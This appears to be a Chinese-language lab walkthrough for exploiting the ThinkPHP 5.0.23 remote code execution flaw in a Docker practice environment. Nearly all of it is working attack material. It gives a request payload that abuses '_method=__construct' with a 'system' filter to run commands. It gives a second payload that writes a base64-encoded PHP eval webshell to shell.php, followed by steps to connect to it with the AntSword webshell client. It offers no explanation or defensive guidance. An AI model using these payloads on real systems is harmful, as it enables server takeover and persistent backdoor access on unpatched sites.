步骤一:.执行以下命令启动靶场环境并在浏览器访问
cd thinkphp/5.0.23-rce
docker-compose up -d
docker ps
步骤二:访问靶机环境
步骤三:/index.php?s=captcha
步骤四:利用HackBar
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir
步骤五:通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码
步骤六:发送POST 请求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php
步骤七:访问shell.php
步骤八:进行蚁剑连接
